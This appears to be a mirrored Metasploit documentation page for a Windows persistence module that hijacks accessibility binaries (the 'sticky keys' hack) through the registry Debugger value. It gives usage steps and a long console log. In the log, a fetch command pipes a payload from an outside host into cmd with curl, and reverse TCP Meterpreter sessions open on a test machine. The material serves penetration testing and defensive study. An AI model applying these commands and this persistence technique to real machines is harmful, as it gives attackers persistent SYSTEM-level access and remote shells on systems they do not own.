Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/persistence/accessibility_features_debugger.md
28810 views

Vulnerable Application

This module makes it possible to apply the 'sticky keys' hack to a session with appropriate rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP login screen or via a UAC confirmation dialog. The module modifies the Debug registry setting for certain executables.

The module options allow for this hack to be applied to:

  • SETHC (sethc.exe is invoked when SHIFT is pressed 5 times),

  • UTILMAN (Utilman.exe is invoked by pressing WINDOWS+U),

  • OSK (osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard),

  • DISP (DisplaySwitch.exe is invoked by pressing WINDOWS+P),

  • NARRATOR (Narrator.exe is invoked by pressing WINDOWS+CTR+ENTER),

  • ATBROKER (AtBroker.exe is invoked by launching accessibility features from the login screen, such as WINDOWS+CTR+ENTER).

Custom payloads and binaries can be run as part of this exploit, but must be manually uploaded to the target prior to running the module.

Verification Steps

  1. Get session on target with admin/system privs

  2. use exploit/windows/persistence/accessibility_features_debugger

  3. set payload <payload>

  4. set session <session>

  5. exploit

  6. Use the key combo to trigger the payload

  7. Get a session

Options

BINARY

The target binary to add the exploit to. Defaults to SETHC.

Options are:

  • SETHC

  • UTILMAN

  • OSK

  • DISP

Scenarios

Windows 10 1909 (10.0 Build 18363)

resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
fetch_command => CURL
resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
fetch_pipe => true
resource (/root/.msf4/msfconsole.rc)> set lport 4450
lport => 4450
resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
FETCH_URIPATH => w3
resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
FETCH_FILENAME => mkaKJBzbDB
resource (/root/.msf4/msfconsole.rc)> to_handler
[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe

[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
[*] Payload Handler Started as Job 0
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /KAdxHNQrWO8cy5I90gLkHg
[*] Adding resource /w3
[*] Started reverse TCP handler on 1.1.1.1:4450 
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > [*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:49842) at 2025-12-05 06:34:00 -0500

msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
sServer username: WIN10PROLICENSE\windows
meterpreter > sysinfo
Computer        : WIN10PROLICENSE
OS              : Windows 10 1909 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/acessibility_features_debugger 
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(windows/persistence/acessibility_features_debugger) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/acessibility_features_debugger) > set session 1
session => 1
msf exploit(windows/persistence/acessibility_features_debugger) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf exploit(windows/persistence/acessibility_features_debugger) > 
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Likely exploitable
[*] Payload pathname: C:\Users\windows\AppData\Local\Temp\HQagFFAsQ.exe
[+] 'Sticky keys' successfully added. Launch the exploit at an RDP or UAC prompt by pressing SHIFT 5 times.
[-] Exploit failed: NoMethodError undefined method `gsub' for nil

msf exploit(windows/persistence/acessibility_features_debugger) > rexploit
[*] Reloading module...
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 1.1.1.1:4444 
msf exploit(windows/persistence/acessibility_features_debugger) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Likely exploitable
[*] Payload pathname: C:\Users\windows\AppData\Local\Temp\vEmsvwn.exe
[+] 'Sticky keys' successfully added. Launch the exploit at an RDP or UAC prompt by pressing SHIFT 5 times.
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251205.3717/WIN10PROLICENSE_20251205.3717.rc
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49843) at 2025-12-05 06:37:30 -0500

msf exploit(windows/persistence/acessibility_features_debugger) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: WIN10PROLICENSE\windows